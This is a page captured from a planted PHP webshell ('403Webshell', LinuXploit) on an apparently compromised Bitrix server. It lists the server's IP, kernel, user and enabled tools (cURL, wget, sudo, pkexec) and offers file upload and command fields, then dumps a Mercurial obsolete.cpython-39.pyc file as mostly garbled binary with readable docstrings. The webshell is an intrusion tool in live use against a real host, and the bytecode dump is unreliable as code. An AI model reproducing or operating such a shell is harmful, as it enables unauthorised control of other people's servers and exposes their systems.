403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /usr/lib64/python3.9/site-packages/mercurial/__pycache__/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /usr/lib64/python3.9/site-packages/mercurial/__pycache__/obsolete.cpython-39.pyc
a

�+�b��@s�dZddlmZddlZddlZddlmZddlmZddl	m
Z
mZddlm
Z
mZmZmZmZmZmZdd	lmZmZe�d
�ZejZejZejZejZdZdZ d
Z!dZ"dd�Z#dd�Z$dd�Z%ej&Z&ej'Z'dZ(dZ)dZ*ee)�Z+ee*�Z,dd�Z-dd�Z.dd�Z/dd�Z0dZ1dZ2dZ3d Z4ee3�Z5ee4�Z6ee2�Z7d!Z8d"Z9e8e9>Z:d#Z;ee;�Z<d$d%�Z=d&d'�Z>d(d)�Z?e(e-e.fe1e?e>fiZ@d*d+�ZAejBdfd,d-��ZCe(fd.d/�ZDd0e(fd1d2�ZEejBd3d4��ZFejBd5d6��ZGejBd7d8��ZHd9d:�ZIGd;d<�d<eJ�ZKd=d>�ZLd?d@�ZMdAZNdBdC�ZOdDdE�ZPdFdG�ZQiZRdHdI�ZSdJdK�ZTdLdM�ZUdNdO�ZVeSdP�dQdR��ZWeSdS�dTdU��ZXeSdV�dWdX��ZYeSdY�dZd[��ZZeSd\�d]d^��Z[eSd_�d`da��Z\dbdc�Z]dgddde�Z^dS)ha�Obsolete marker handling

An obsolete marker maps an old changeset to a list of new
changesets. If the list of new changesets is empty, the old changeset
is said to be "killed". Otherwise, the old changeset is being
"replaced" by the new changesets.

Obsolete markers can be used to record and distribute changeset graph
transformations performed by history rewrite operations, and help
building new tools to reconcile conflicting rewrite actions. To
facilitate conflict resolution, markers include various annotations
besides old and news changeset identifiers, such as creation date or
author name.

The old obsoleted changeset is called a "predecessor" and possible
replacements are called "successors". Markers that used changeset X as
a predecessor are called "successor markers of X" because they hold
information about the successors of X. Markers that use changeset Y as
a successors are call "predecessor markers of Y" because they hold
information about the predecessors of Y.

Examples:

- When changeset A is replaced by changeset A', one marker is stored:

    (A, (A',))

- When changesets A and B are folded into a new changeset C, two markers are
  stored:

    (A, (C,)) and (B, (C,))

- When changeset A is simply "pruned" from the graph, a marker is created:

    (A, ())

- When changeset A is split into B and C, a single marker is used:

    (A, (B, C))

  We use a single marker to distinguish the "split" case from the "divergence"
  case. If two independent operations rewrite the same changeset A in to A' and
  A'', we have an error case: divergent rewriting. We can detect it because
  two markers will be created independently:

  (A, (B,)) and (A, (C,))

Format
------

Markers are stored in an append-only file stored in
'.hg/store/obsstore'.

The file starts with a version header:

- 1 unsigned byte: version number, starting at zero.

The header is followed by the markers. Marker format depend of the version. See
comment associated with each format for details.

�)�absolute_importN�)�_)�getattr)�bin�hex)�encoding�error�obsutil�phases�policy�pycompat�util)�dateutil�hashutil�parsers�
createmarkerss
allowunstablesallowdivergencesexchangec	Cs�d|}|j�d|�}|dur"|Sz|j�dd�WStjtfy�t|j�dd��}d|vrfYdS|j�dd�}|r�|�d�||vYS0dS)	�TReturns True if the given repository has the given obsolete option
    enabled.
    sevolution.%s�experimentalNs	evolutionsallTsevolution.createmarkersr)	�ui�
configboolr	ZConfigError�AttributeError�setZ
configlist�config�add)�repo�optionZ	configkeyZ	newconfig�result�r�8/usr/lib64/python3.9/site-packages/mercurial/obsolete.py�_getoptionvaluems
r cCsNt|t�}|r.t|t�}t|t�}t|t�}nd}d}d}t|t|t|t|iS)z5Returns dicts showing state of obsolescence features.F)r �createmarkersopt�allowunstableopt�allowdivergenceopt�exchangeopt)rZcreatemarkersvalueZ
unstablevalueZdivergencevalueZ
exchangevaluerrr�
getoptions�s


�r%cCst|�|S)r)r%)rrrrr�	isenabled�sr&s>BIB20ss20sccs�||k�r�|||t�}|t7}tt|�\}}}}d}|rjt|}	||||	�}tt||�}||	7}||||�}
t|
�|kr�t�td�|t|
�f��||7}t	|
�}
z*|
�
dd��d�\}}t|�t
|�f}
Wnty�d}
Yn0d}d|
v�r|
�
dd�|
�
dd�f}n(d|
v�r4|
�
dd�f}nd	|
v�rBd}|du�r�z:td
d�|D��}|D]}t|�dk�rdd}�q��qdWnt�y�d}Yn0ttt�|
���}
||||
|
|fVqdS)
NrsIparsing obsolete marker: metadata is too short, %d bytes expected, got %d�dates0 0� )grsp2sp1�p0css|]}t|�VqdS�N)r��.0�prrr�	<genexpr>��z"_fm0readmarkers.<locals>.<genexpr>�)�	_fm0fsize�_unpack�	_fm0fixed�
_fm0fnodesize�_fm0node�lenr	�Abortr�_fm0decodemeta�pop�split�float�int�
ValueError�tuple�	TypeError�sortedr
�	iteritems)�data�off�stopZcur�numsucZmdsize�flags�pre�sucs�s�metadataZwhen�offset�date�parentsr-rrr�_fm0readmarkers�sX
�
��





rNcCs�|\}}}}}}|t@r&t�td���t|�}|\}}d||f|d<|dur~|sZd|d<t|d�D]\}	}
t|
�|d|	<qdt|�}t|�}t	t
|}|t|�||g}
|
�|�t|g|
�R�|S)Ns-cannot handle sha256 with old obsstore formats%r %ir'r/r)rsp%i)
�usingsha256r	r7r�dict�	enumerater�_fm0encodemetar6r3r5�extend�_pack)�markerrGrHrFrJrLrM�time�tz�ir-rE�formatrBrrr�_fm0encodeonemarkers"
rZcsXt���D]0\}}d|vs"d|vr*td��d|vr
td��q
d��fdd�t��D��S)zmReturn encoded metadata string to string mapping.

    Assume no ':' in key and no '' in both key and value.�:�s*':' and '' are forbidden in metadata key's#':' is forbidden in metadata value'csg|]}d|�|f�qS)s%s:%sr)r,�k��metarr�
<listcomp>r/z"_fm0encodemeta.<locals>.<listcomp>)r
rAr=�joinr@)r_�key�valuerr^rrRs
rRcCs4i}|�d�D] }|r|�dd�\}}|||<q|S)z8Return string to string dictionary from encoded version.r\r[r)r:)rB�d�lrbrcrrrr8"s
r8s>IdhHBBBs32s��sBBc cs�t}t}t}t}t}t}t}	t}
t}t	}t
�t�j
}
||k�r�||}|
|||��\}}}}}}}||@rv|}|}n|}|}||||||��\}||7}|dkr�||}|||�f}n"|||}||||||��}||kr�|}d}nD|dk�r||}|||�f}n"|||}||||||��}||	|}|d|
||||��}g}t�dt|�d�D]D}|||}|||d}|�|||�|||�f�|}�qr|||t|�||df|fVq4dS)Nr�>r��<)�_fm1parentnonerO�_fm1nodesha1size�_fm1nodesha256size�_fm1nodesha1�_fm1nodesha256�_fm1metapairsize�_fm1metapair�	_fm1fsizer2�struct�Struct�	_fm1fixed�unpackr
Zxranger6�appendr>) rBrCrDZnoneflagZsha2flagZsha1sizeZsha2sizeZsha1fmtZsha2fmtZmetasizeZmetafmtZfsizervZufixedZo1�tZsecsrWrFrE�numparZnummetaZnodefmtZnodesize�precZo2rHZo3rMZmetapairsizerJ�idxrrr�_fm1purereadmarkers\sV

r|cCs�|\}}}}}}t}|t@r t}t|�}d|}	|dur>t}
nt|�}
|	|
7}	||	}tt|�}t||}
|dd}d|d||||
t|�|g}|�|�|dur�|�|�t|
�}|D]x\}}t|�}t|�}|dkr�d||f}t	�
|��|dk�rd|||f}t	�
|��|�|�|�|�|||7}q�||d<t|
g|�R�g}|D]\}}|�|�|�|��qVd�
|�S)Nrrjr�sLobsstore metadata key cannot be longer than 255 bytes (key "%s" is %u bytes)s]obsstore metadata value cannot be longer than 255 bytes (value "%s" for key "%s" is %u bytes)r/)rnrOror6rkrqrurS�	_calcsizer	�ProgrammingErrorrwrTra)rUrGrHrFrJrLrMZ_fm1noderEZ
numextranodesryZformatnodesZ
formatmetarYrWrBZ	totalsizerbrcZlk�lv�msgrrr�_fm1encodeonemarker�sR

�

�



r�cCs(ttdd�}|st|||�S||||�S)NZfm1readmarkers)rrr|)rBrCrDZnativerrr�_fm1readmarkers�sr�cCstd|dd��dS)N�>Brr)r2)rBrrr�_readmarkerversion�sr�cCsZt|�}|sd}|dur t|�}|tvrBtd�|}tj||d��|t|d|||�fS)z(Read and enumerate markers from raw datarNs+parsing obsolete marker: unknown version %r��versionr)r�r6�formatsrr	ZUnknownVersion)rBrCrDZdiskversionr�rrr�_readmarkers�sr�cCs
td|�S)Nr�)rTr�rrr�encodeheader�sr�Fccs2t|d}|rt|�V|D]}||�VqdS�Nr)r�r�)�markersZ	addheaderr�Z	encodeonerUrrr�
encodemarkers�s

r�cCs&|D]}|�|dt���|�qdS)Nr��
setdefaultrr)�
successorsr��markrrr�_addsuccessors�sr�cCs0|D]&}|dD]}|�|t���|�qqdSr�r�)�predecessorsr�r�Zsucrrr�_addpredecessorssr�cCs<|D]2}|d}|dur|D]}|�|t���|�qqdS)N�r�)�childrenr�r�rMr-rrr�_addchildrens
r�cCs*|D] }|j|dvrt�td���qdS)z�search for marker with invalid data and raise error if needed

    Exist as a separated function to allow the evolve extension for a more
    subtle handling.
    rs;bad obsolescence marker detected: invalid successors nullidN)Znullidr	r7r)rr�r�rrr�_checkinvalidmarkerss��r�c@s�eZdZdZdZedfdd�Zdd�Zdd	�Zd
d�Z	e	Z
edd
��Zd)dd�Z
dd�Zdd�Zedd��Zedd��Zedd��Zedd��Zedd ��Zed!d"��Zd#d$�Zd%d&�Zd'd(�ZdS)*�obsstoreaStore obsolete markers

    Markers can be accessed with two mappings:
    - predecessors[x] -> set(markers on predecessors edges of x)
    - successors[x] -> set(markers on successors edges of x)
    - children[x]   -> set(markers on predecessors edges of children(x)
    )sprecssuccssflagsmetar'sparentsFcCs"i|_||_||_||_||_dSr*)�caches�svfsr�_defaultformat�	_readonly)�selfrr��
defaultformat�readonlyrrr�__init__3s
zobsstore.__init__cCs
t|j�Sr*)�iter�_all�r�rrr�__iter__;szobsstore.__iter__cCs
t|j�Sr*)r6r�r�rrr�__len__>szobsstore.__len__c
Cs�ddlm}t|j|j�r(t|j�dkS|�d�szz|j�	d�j
dkWStyx}z|jtj
krd�WYd}~n
d}~00t|j�S)Nr)�statichttprepor��obsstore)�r��
isinstancerZstatichttprepositoryr6�_data�_cachedr��stat�st_size�OSError�errno�ENOENT�boolr�)r�r��instrrr�__nonzero__As
zobsstore.__nonzero__cCs|jS)zgTrue if marker creation is disabled

        Remove me in the future when obsolete marker is always on.)r�r�rrrr�Tszobsstore.readonlyrrNc	
Cs�t|�}|duri}|durdd|vr6t�|�d��}n.|dur\|�dd�}|durdt��}nt��}|t@r�t|�dkr�t|��|D]}	t|	�dkr�t|	��q�n2t|�dkr�t|��|D]}	t|	�dkr�t|	��q�||vr�tdt	�
t|����tt
t	�|���}|D]V\}
}z|
�d�|�d�Wn2t�yXt�d	t	�|
�t	�|�f��Yn0�qt|�t|�||||f}t|�||g��S)
a~obsolete: add a new obsolete marker

        * ensuring it is hashable
        * check mandatory metadata
        * encode metadata

        If you are a human writing code creating marker you want to use the
        `createmarkers` function in this module instead.

        return True if a new marker have been added, False if the markers
        already existed (no op).
        Nr'�develsdefault-date� r0zin-marker cycle with %szutf-8sEobsstore metadata must be valid UTF-8 sequence (key = %r, value = %r))r<rZ	parsedater9Z
configdateZmakedaterOr6r=r
Zsysstrrr>r@rA�decode�UnicodeDecodeErrorr	rZbytestr�bytesr�r)
r��transactionrzZsuccs�flagrMrLrJrZsuccr]�vrUrrr�create[sN

�
��zobsstore.createcCs |jrt�td���t�}|jj}g}|D]2}|||dd�vr*||vr*|�|�|�|�q*|r�|�	dd�}zB|�
�}|�d|�d�t||dk|j
��}	|�|	�W|��n
|��0|j�d�}
|
dur�|
�|�|�||	�|j��t|j�d	d
��}d|t|�|jd	<t|�S)zpAdd new markers to the store

        Take care of filtering duplicate.
        Return the number of new marker.s5creating obsolete markers is not enabled on this reporrr�sabr/s
obsmarkersNsnew_obsmarkers�0�%d)r�r	r7rrr��getrrwr��tellrar��_version�write�closeZchanges�update�_addmarkersr��clearr<Zhookargsr6)r�r�r�ZknownZ
getsuccessors�new�m�frKrBZaddedmarkersZpreviousrrrr�s6�


zobsstore.addcCst|�\}}|�||�S)zfmerge a binary stream of markers inside the obsstore

        Returns the number of new markers added.)r�r)r�r�rBr�r�rrr�mergemarkers�szobsstore.mergemarkerscCs|j�d�S)Nr�)r�Ztryreadr�rrrr��szobsstore._datacCs"t|j�dkrt|j�S|jSdSr�)r6r�r�r�r�rrrr��s
zobsstore._versioncCs4|j}|sgSt|�\|_}t|�}t|j|�|Sr*)r�r�r��listr�r)r�rBr�rrrr��sz
obsstore._allcCsi}t||j�|Sr*)r�r�)r�r�rrrr��szobsstore.successorscCsi}t||j�|Sr*)r�r�)r�r�rrrr��szobsstore.predecessorscCsi}t||j�|Sr*)r�r�)r�r�rrrr��szobsstore.childrencCs
||jvSr*)�__dict__)r��attrrrrr��szobsstore._cachedcCsrt|�}|j||_|j�|�|�d�r6t|j|�|�d�rLt|j|�|�d�rbt	|j
|�t|j|�dS)Nr�r�r�)
r�r�r�rSr�r�r�r�r�r�r�r�r)r�r�Zrawdatarrrr��s


zobsstore._addmarkerscCs�t|�}t�}t|�}|j}|j}|j}|r�t�}|D]V}	|�|�|	d��dd�|�|	d�D�}
|�|
�dd�|�|	d�D�}
|�|
�q6||8}dd�|D�}||O}||8}||O}q(|S)aqreturn a set of all obsolescence markers relevant to a set of nodes.

        "relevant" to a set of nodes mean:

        - marker that use this changeset as successor
        - prune marker of direct children on this changeset
        - recursive application of the two rules on predecessors of these
          markers

        It is a set so you cannot rely on order.rcSsg|]}|ds|�qS�rr�r,r�rrrr`r/z,obsstore.relevantmarkers.<locals>.<listcomp>cSsg|]}|ds|�qSr�rr�rrrr`r/cSsh|]}|d�qS)rrr�rrr�	<setcomp>r/z+obsstore.relevantmarkers.<locals>.<setcomp>)rr�r�r�r�r�)r�ZnodesZpendingnodesZseenmarkersZ	seennodesZprecursorsmarkersZsuccsmarkersr�Zdirect�currentZprunedrrr�relevantmarkerss(

zobsstore.relevantmarkers)rrNNNN)�__name__�
__module__�__qualname__�__doc__�fields�_fm1versionr�r�r�r��__bool__�propertyr�r�rr��
propertycacher�r�r�r�r�r�r�r�r�rrrrr�!sB	

�
E'


	


r�cCsj|�dd�}i}|dur ||d<t|t�}t||jfd|i|��}|rf|rf|�td�tt|���|S)z(Create an obsstore instance from a repo.sformatsobsstore-versionNr�r�s3obsolete feature not enabled but %i markers found!
)	Z	configintr&r!r�r��warnrr6r�)rrr��kwargsr��storerrr�	makestore&s
��r�cCs*|jdd�|D]}|tvr|SqdS)z|Return the newest version listed in both versions and our local formats.

    Returns None if no common version exists.
    T)�reverseN)�sortr�)Zversionsr�rrr�
commonversion9s

r�i�c
Cs�i}g}td}|D]D}t|�}t|�|tkrBg}d}|�|�|�|�|t|�7}qtt|��D]0\}}d�tdt�g|�}	t	�
|	�|d|<qf|S)z�encode markers into a dict suitable for pushkey exchange

    - binary data is base85 encoded
    - split in chunks smaller than 5300 bytesrirr/r�sdump%i)�_maxpayloadrZr6rwrQ�reversedrarT�_fm0versionrZ	b85encode)
r��keys�partsZ
currentlenrUZnextdataZcurrentpartr{�partrBrrr�_pushkeyescapeMs

r�cCs|js
iStt|j��S)zList markers over pushkey)r�r�r@�rrrr�listmarkerscsr�c	Cs�|�d�s"|j�td�|�dS|r>|j�td�|�dSt�|�}|���^|�d��4}|j�	||�|�
�Wd�Wd�dS1s�0YWd�n1s�0YdS)zPush markers over pushkeysdumpsunknown key: %rFsunexpected old value for %rspushkey: obsolete markersNT)�
startswithrr�rrZ	b85decode�lockr�r�r�Zinvalidatevolatilesets)rrb�oldr�rB�trrrr�
pushmarkerjs

r�cs�fdd�}|S)zADecorator to register a function as computing the cache for a setcs.�tvr"d}t�|�t�f��|t�<|S)Ns;duplicated registration for volatileset '%s' (existing: %r))�
cachefuncsr	r)�funcr���namerr�	decorator�s
zcachefor.<locals>.decoratorr)r�r�rr�r�cachefor}sr�cCs~|��}t�d|��V|js0t�Wd�S||jjvrPt||�|jj|<|jj|Wd�S1sp0YdS)zyReturn the set of revision that belong to the <name> set

    Such access may compute the set and cache it for future usez
getrevs %sN)Z
unfilteredrZtimedcmr��	frozensetr�r�)rr�rrr�getrevs�sr�cCsd|jvr|jj��dS)z�Remove all obsolescence related cache from a repo

    This remove all cache in obsstore is the obsstore already exist on the
    repo.

    (We could be smarter here given the exact event that trigger the cache
    clearing)r�N)Z
_filecacher�r�r�r�rrr�clearobscaches�s	
r�cCs|j�|tj�S)z-the set of mutable revision in the repository)�_phasecacheZ	getrevsetrZ
mutablephasesr�rrr�_mutablerevs�sr��obsoletecs2|jj�t|�}|jjj�t��fdd�|D��S)zthe set of obsolete revisionsc3s|]}��|��r|VqdSr*r�r,�r�ZgetnodeZisobsrrr.�r/z&_computeobsoleteset.<locals>.<genexpr>)�	changelog�noder�r�r��__contains__r�)rZ	notpublicrrr�_computeobsoleteset�s
r�orphancCsj|jj}t|�}t|d�}||}t�}t|�D]0}||�D]"}||vsP||vr<|�|�q0q<q0t|�S)z7the set of non obsolete revisions with obsolete parentsr�)rZ
parentrevsr�r�rr@rr�)rZpfunc�mutableZobsoleteZothersZunstabler�r-rrr�_computeorphanset�s

r�	suspendedcs.|j�t|d���t�fdd�t|d�D��S)z9the set of obsolete parents with non obsolete descendantsrc3s|]}|�vr|VqdSr*rr��Z	suspendedrrr.�r/z'_computesuspendedset.<locals>.<genexpr>r�)rZ	ancestorsr�r�r�rr	r�_computesuspendedset�sr
sextinctcCst|d�t|d�S)z<the set of obsolete parents without non obsolete descendantsr�r)r�r�rrr�_computeextinctset�srsphasedivergentcCs�t�}|jj}tj}|j}|jj}|j}|j	}|�
d�D]P}||�}	tj||	gt
d�D]0}
||
�}|durV|||�|krV|�|�q8qVq8t|�S)z3the set of revs trying to obsolete public revisionss#(not public()) and (not obsolete()))ZignoreflagsN)rr��phaser�publicr�indexZget_revrr��revsr
Zallpredecessors�	bumpedfixrr�)rZbumpedrr
ZclZtorev�tonoder��revrZpnode�prevrrr�_computephasedivergentset�s"�

rscontentdivergentcCs�t�}|j}i}|jj}|�d�D]�}||�}|j�|d�}t|�}t�}	|r"|��d}
|
|	vrdqJ|	�|
�|
|vr�t	j
||
|d�dd�||
D�}t|�dkr�|�|�q"|�|j�|
d��qJq"t
|�S)zHthe set of rev that compete to be the final successors of some revision.s(not public()) - obsolete()rr)�cachecSsg|]}|r|�qSrr)r,�nrrrr`r/z/_computecontentdivergentset.<locals>.<listcomp>r)rr�rrrr�r�r9rr
Zsuccessorssetsr6r�r�)rZ	divergentr�Znewermaprrrr�Z	toprocess�seenrzZnewerrrr�_computecontentdivergentset�s,

rcCsTt�|�}|d|dD]$}|�d|���|�|���qt|���dd�S)Nrrr��)rZsha1r�rrr�digest)Zrelation�userZ
folddigestr-rrr�
makefoldids

rcCsl|duri}d|vr:|j�dd�p*|j��}t�|�|d<|j�dd�}|rX|rX||d<|j�dd�}|�d	����}	g}
|D�]�}|d
}t|t�s�|f}t	|�dkr�t	|d�dkr�d}
t
�|
t	|d���d}t	|�}d|kr�t||d�}t
|d�D�]\}}|d}|��}t	|�d
k�r2|�|d
�|du�r\||d<d||d<d||d<|���s|t
jtd�|dd��|��}tdd�|D��}d}|�s�tdd�|��D��}||v�r�t
�td�|��|�r�t�||�}d||tj<|
�||||f�q�q||
D]:}|\}}}}|jj|	|||||||jd�|j���qWd�n1�s^0YdS)a�Add obsolete markers between changesets in a repo

    <relations> must be an iterable of ((<old>,...), (<new>, ...)[,{metadata}])
    tuple. `old` and `news` are changectx. metadata is an optional dictionary
    containing metadata for this marker only. It is merged with the global
    metadata specified through the `metadata` argument of this function.
    Any string values in metadata must be UTF-8 bytes.

    Trying to obsolete a public changeset will raise an exception.

    Current user and date are used except if specified otherwise in the
    metadata attribute.

    This function operates within a transaction of its own, but does
    not take any lock on the repo.
    Nsuserr�suser.obsmarkerrsevolution.track-operations	operationsevolution.effect-flagssadd-obsolescence-markerrrs/Fold markers can only have 1 successors, not %drisfold-idr�sfold-idxs	fold-sizes$cannot obsolete public changeset: %ss see 'hg help phases' for details)�hintcss|]}|��VqdSr*�r)r,rIrrrr.]r/z createmarkers.<locals>.<genexpr>css|]}|��VqdSr*rr+rrrr.`r/s#changeset %s cannot obsolete itself)rMrLrJr)rr�usernamerZ	fromlocalrr�r�r>r6r	rrrQ�copyr�rr7rrrMr
Z
geteffectflagZEFFECTFLAGFIELDrwr�r�Zfilteredrevcacher�)rZ	relationsr�rLrJZ	operationZluserZuseoperationZsaveeffectflagr�Z
markerargs�relr�r�ZfoldidZfoldsizeZfoldidxrzrHZ
localmetadataZnprecZnsucsZnpareZ
effectflag�argsrrr�
createmarkerss����




�

��
r#)NN)rNNN)_r�Z
__future__rr�rsZi18nrr
rrrrr�rr	r
rrrZutilsrrZ	importmodr�packrTrvr2�calcsizer~r�r!r"r#r$r r%r&rrOr�r3r5r1r4rNrZrRr8r�rurnrorlrmrrrkZ_fm1parentshiftZ_fm1parentmaskrqrpr|r�r�r�r�Znogcr�r�r�r�r�r�r��objectr�r�r�r�r�r�r�r�r�r�r�r�rrr
rrrrr#rrrr�<module>	s�=$	
	8,?1
�












�

Youez - 2016 - github.com/yon3zu
LinuXploit